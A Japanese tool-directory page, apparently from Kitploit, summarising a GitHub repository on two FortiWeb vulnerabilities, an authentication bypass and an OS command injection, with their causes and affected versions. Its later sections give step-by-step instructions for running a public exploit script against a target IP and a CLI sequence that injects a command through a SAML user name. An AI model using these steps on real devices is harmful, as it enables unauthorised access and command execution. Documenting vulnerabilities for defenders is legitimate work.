Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
fortinet-fortiweb-cve-2025-64446-58034 — Fortinet FortiWebの脆弱性に関するセキュリティ研究 (CVE-2025-64446, CVE-2025-58034) | Kitploit
ツール/GitHubGitHub/lequoca/fortinet-fortiweb-cve-2025-64446-58034
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHublequoca/fortinet-fortiweb-cve-2025-64446-58034

fortinet-fortiweb-cve-2025-64446-58034

Fortinet FortiWebの脆弱性に関するセキュリティ研究 (CVE-2025-64446, CVE-2025-58034)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
38ヶ月前未レビュー

Fortinet FortiWebの脆弱性について (CVE-2025-64446, CVE-2025-58034)

1. 概要

Fortinet FortiWebは、Webアプリケーションファイアウォール(WAF)であり、 エンタープライズシステムで広く導入され、 Webアプリケーションを一般的な脅威から保護しています。

FortiWebは通常、保護の中核層に位置するため、 認証やOSコマンド実行に関する脆弱性は、 背後にあるインフラ全体に深刻な影響を及ぼす可能性があります。 2025年には、FortiWebにおいて2つの深刻な脆弱性が公表されました。

  • CVE-2025-64446 – 相対パストラバーサルによる認証バイパス

  • CVE-2025-58034 – 認証後のコンテキストにおけるOSコマンドインジェクション

  • 2. CVE-2025-64446の概要

2.1 脆弱性の種類

  • 相対パストラバーサル
  • 認証バイパス

2.2 脆弱性の原因

CVE-2025-64446は、FortiWebが 認証メカニズムを適用する前に、 アクセスパスの処理とチェックを厳密に行っていないことに起因します。

具体的には:

  • 論理パス文字列に基づくアクセス制御メカニズム
  • パスの完全な正規化(normalize)が行われていない
  • 相対パスを使用した内部リソースへのアクセスを許容

この欠陥により、一部の管理エンドポイントが 有効な認証なしでアクセス可能となります。

2.3 セキュリティへの影響

  • 認証メカニズムの完全な回避
  • 管理機能への不正アクセス
  • セキュリティ機器の権限モデルの破壊

2.4 影響を受けるバージョン

  • FortiWeb 8.0.0 – 8.0.1
  • FortiWeb 7.6.0 – 7.6.4
  • FortiWeb 7.4.0 – 7.4.9
  • FortiWeb 7.2.0 – 7.2.11
  • FortiWeb 7.0.0 – 7.0.11

3. CVE-2025-58034の概要

3.1 脆弱性の種類

  • OSコマンドインジェクション(CWE-78)

3.2 脆弱性の原因

CVE-2025-58034は、FortiWebが OSコマンド呼び出しの過程において、 ユーザー入力データを安全に処理していないために発生します。

主な原因としては:

  • 入力パラメータの厳密なチェック不足
  • 特殊文字のフィルタリングやエスケープ機構の欠如
  • ユーザーデータがシステムコマンドに直接渡される

この脆弱性は認証後のコンテキストを必要としますが、 コマンド実行に関連するため、依然としてリスクレベルは高いです。

3.3 セキュリティへの影響

  • 意図しないOSコマンドの実行
  • システムリソースへのアクセスと操作
  • 機器の完全性と可用性への影響

3.4 影響を受けるバージョン

  • FortiWeb 8.0.0 – 8.0.1
  • FortiWeb 7.6.0 – 7.6.5
  • FortiWeb 7.4.0 – 7.4.10
  • FortiWeb 7.2.0 – 7.2.11
  • FortiWeb 7.0.0 – 7.0.11

4. エクスプロイトの方法(公開PoC参照 - CVE-2025-64446)

4.1 リポジトリのクローン(ソースコードをローカルにダウンロード)

git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034 cd CVE-2025-64446_CVE-2025-58034

4.2 仮想環境のセットアップ (venv)

Python仮想環境(venv)は、プロジェクトごとに独立した作業環境を作成し、依存ライブラリをメインのPythonシステムから分離するために使用します。これにより、ライブラリのバージョン競合を回避し、作業環境の安定性を確保し、システムへの影響を最小限に抑えます。

python3 -m venv venv source venv/bin/activate

4.3 依存関係のインストール:

pip install -r requirements.txt

4.4 エクスプロイト全体の実行

python exploit.py <target_ip> image image image

5. CVE-2025-58034のエクスプロイト方法(FortiWebのCLIから認証後に実行)

config user saml-user

edit "<YOUR COMMAND>"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

CVE-2025-58034脆弱性は、FortiWebが一部の設定フィールド、特に edit "" ステートメントを介して渡される値において、入力データを厳密に制御していないために発生します。 問題点: この値は設定文字列として処理され その後内部のOSコマンドに組み込まれる 特殊文字のフィルタリングやエスケープが十分に行われていない これにより、設定データが実行されるOSコマンドに直接影響を与え、OSコマンドインジェクション脆弱性を引き起こします。

ツールをダウンロード